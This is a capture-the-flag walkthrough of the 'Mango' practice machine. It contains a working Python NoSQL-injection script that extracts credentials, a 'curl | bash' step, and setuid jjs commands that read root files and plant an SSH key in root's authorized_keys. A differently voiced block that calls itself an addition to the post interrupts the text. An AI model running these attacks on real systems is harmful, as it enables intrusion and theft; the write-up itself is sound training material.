By: Hilbert


Starting with a standard nmap scan…

# Nmap 7.80 scan initiated Fri Nov  1 13:43:18 2019 as: nmap -sC -sV -p- -oN nmapscan.txt
Nmap scan report for
Host is up (0.098s latency).
Not shown: 65532 closed ports
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Fri Nov  1 13:49:24 2019 -- 1 IP address (1 host up) scanned in 366.57 seconds

We see ssh, http, and https ports are open. Using our web browser to visit the site on port 80, we see we don't have permission (the 403 Forbidden that nmap also reported). If we visit the https site (after accepting the certificate) we see


of which the analytics link takes us to


which provides us with nothing more than a rabbit hole to go down. If you looked at the SSL cert instead of blindly accepting it (cough) you’ll see there is another host name.


This was also visible in the nmap scan

ssl-cert: Subject: Prv Ltd./stateOrProvinceName=None/countryName=IN

If we edit that into our /etc/hosts file

root@kali:~/HTB/Boxes/Mango# cat /etc/hosts       localhost       kali

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

and then visit that site with our browser on the standard port, we are greeted by a login page


Here is where the name for the box comes into play. Mango is supposed to make you think of MongoDB, a popular NoSQL database used as a web backend. Because the login form is very likely querying MongoDB, query operators such as $regex and $gt may be injectable through the form fields. By using Burp Suite and some information from this site (PayloadsAllTheThings)

We can test if this site is vulnerable to noSQL injection.

noSQL Test

We have a successful login! Looking at the page we don’t see much

home page

other than that there is an admin user. However, now that we know the site is vulnerable to NoSQL injection, we can get the usernames and passwords out of the database one character at a time: a $regex prefix that matches causes a successful login (a 302 redirect), and one that does not match returns the login page.


Using the information from the PayloadsAllTheThings page, as well as this helpful blog post

I wrote the following Python script:

#!/usr/bin/env python3

import requests
import string

url = ""  # login form URL (elided in the original post; fill in before running)

def main():
    users = enum_users()

    if users:
        enum_passwords(users)
        for user in users:
            print('{}:{}'.format(user, users[user]))
    else:
        print('\nNo Users Found')

def enum_users():
    # Grow usernames one character at a time: username[$regex]=^<prefix> together with
    # password[$gt]='' logs in (302 redirect) whenever some user matches the prefix.
    # Note: a username that is a prefix of another username would not be reported.
    users = {}
    partial = {''}
    idle = ''

    while True:
        temp = set()
        for p in partial:
            flag = False
            for char in string.ascii_letters + string.digits:
                idle = print_idle(idle, 'Users')
                test = p + char
                post_data = {'username[$regex]': '^' + test, 'password[$gt]': '', 'login': 'login'}
                r = requests.post(url, data=post_data, allow_redirects=False)
                if r.status_code == 302:
                    flag = True
                    temp.add(test)
                # '9' is the last candidate character; if nothing extended p, p is a complete username
                if char == "9" and not flag:
                    users[p] = ""
                    print('\nFound User: ' + p)
        partial = temp.copy()
        if not temp:
            break

    return users

def enum_passwords(users):
    # Regex metacharacters must be escaped so they are matched literally
    special = "~!@#$%^&*(){}[]<>?:"

    for user in users:
        length = get_pass_length(user)
        password = ""
        idle = ""
        for x in range(0, length):
            for char in string.ascii_letters + string.digits + special:
                if char in special:
                    char = '\\' + char
                idle = print_idle(idle, 'Password for User \'{}\': {}'.format(user, password.replace('\\', "")))
                test = password + char
                post_data = {'username': user, 'password[$regex]': '^' + test, 'login': 'login'}
                r = requests.post(url, data=post_data, allow_redirects=False)
                if r.status_code == 302:
                    password = test
        users[user] = password.replace('\\', "")
        print('\n{}:{}'.format(user, users[user]))

def get_pass_length(user):
    # '.{n}' matches any password of at least n characters; stop at the first n that fails
    length = 1
    while True:
        post_data = {'username': user, 'password[$regex]': '.{{{}}}'.format(length), 'login': 'login'}
        r = requests.post(url, data=post_data, allow_redirects=False)
        if r.status_code == 302:
            length += 1
        else:
            return length - 1

def print_idle(idle, text):
    # Simple progress indicator printed on a single line
    if (not len(idle)):
        idle = ' ' * 30
    print('Enumerating {}{}'.format(text, idle), end='\r', flush=True)
    idle += '.'
    if (len(idle) < 8):
        return idle
    if (len(idle) == 8):
        return '        '
    if (len(idle) > 8):
        return '.'

if __name__ == '__main__':
    main()

and running it gives us the following users and passwords
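To show what the script above is exploiting, here is an added Python example that is not from the original post and does not use the box's real backend code (which the post never shows): it emulates, as an assumption, a PHP-style form parser that turns `username[$regex]` into a nested MongoDB operator, runs the resulting query against a constructed user set, and puts a string-type check beside it as the fix.

```python
import re

# Constructed stand-in for the site's MongoDB users collection (sample data, not from the box)
USERS = [
    {"username": "admin", "password": "s3cret!"},
    {"username": "mango", "password": "h3lloWorld"},
]

def parse_form(fields):
    """Assumed backend behaviour: bracketed keys such as 'username[$regex]'
    become nested dicts, so the operator reaches the database query intact."""
    query = {}
    for key, value in fields.items():
        m = re.fullmatch(r"(\w+)\[(\$\w+)\]", key)
        if m:
            field, op = m.groups()
            query.setdefault(field, {})[op] = value
        else:
            query[key] = value
    return query

def matches(doc_value, cond):
    """Minimal emulation of MongoDB matching: equality, $regex and $gt."""
    if not isinstance(cond, dict):
        return doc_value == cond
    for op, arg in cond.items():
        if op == "$regex" and not re.search(arg, doc_value):
            return False
        if op == "$gt" and not doc_value > arg:
            return False
    return True

def run_query(query):
    """Usernames of documents matching the username/password conditions."""
    return [u["username"] for u in USERS
            if all(matches(u[f], c) for f, c in query.items()
                   if f in ("username", "password"))]

def login_vulnerable(fields):
    # Operators injected via form field names are passed straight through to the query.
    return run_query(parse_form(fields))

def login_hardened(fields):
    # Fix: refuse anything that is not a plain string before it touches the query,
    # so {'$regex': ...} / {'$gt': ...} objects can never stand in for a credential.
    query = parse_form(fields)
    if any(not isinstance(query.get(f), str) for f in ("username", "password")):
        return []
    return run_query(query)
```

With the same post_data the script sends, login_vulnerable matches the `^ad` prefix and the `.{7}` length probe, while login_hardened returns nothing for either and only accepts a real username/password pair.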


We'll find we can SSH in as user mango with those creds. However, the user flag is in /home/admin; the admin password doesn't work for SSH, but it does work for su:

root@kali:~/HTB/Boxes/Mango# ssh mango@
mango@'s password:                                                           
Last login: Mon Nov 11 20:58:31 2019 from
mango@mango:~$ su admin
$ whoami
$ cd /home/admin
$ ls -la
total 24
drwxr-xr-x 2 admin admin 4096 Sep 30 03:20 .
drwxr-xr-x 4 root  root  4096 Sep 27 14:02 ..
lrwxrwxrwx 1 admin admin    9 Sep 27 14:30 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 admin admin  807 Apr  4  2018 .profile
-r-------- 1 admin admin   33 Sep 27 14:29 user.txt

On To Root

Running LinEnum, we see a binary that members of the admin group can execute and that runs as root (jjs is setuid root and setgid admin, which is why it shows up in the SGID list):

admin@mango:/home/admin$ curl | bash
[-] SGID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

Using information from gtfobins

we can execute the following commands to see the root flag

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("");
jjs> var FileReader = Java.type("");
jjs> var br = new BufferedReader(new FileReader("/root/root.txt"));
jjs> while ((line = br.readLine()) != null) { print(line); };

If that's not good enough and you want to log in as root, we can write our SSH public key into root's authorized_keys by placing your SSH public key into the following command

echo 'var FileWriter = Java.type("");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa <your-public-key>");
fw.close();' | jjs

and after executing it, we can then SSH in as root.

root@kali:~/HTB/Boxes/Mango# ssh root@
Last login: Mon Nov 11 22:22:19 2019 from
root@mango:~# whoami
root@mango:~# id
uid=0(root) gid=0(root) groups=0(root)

If you found this walkthrough helpful, please consider adding a respect to my profile, thanks.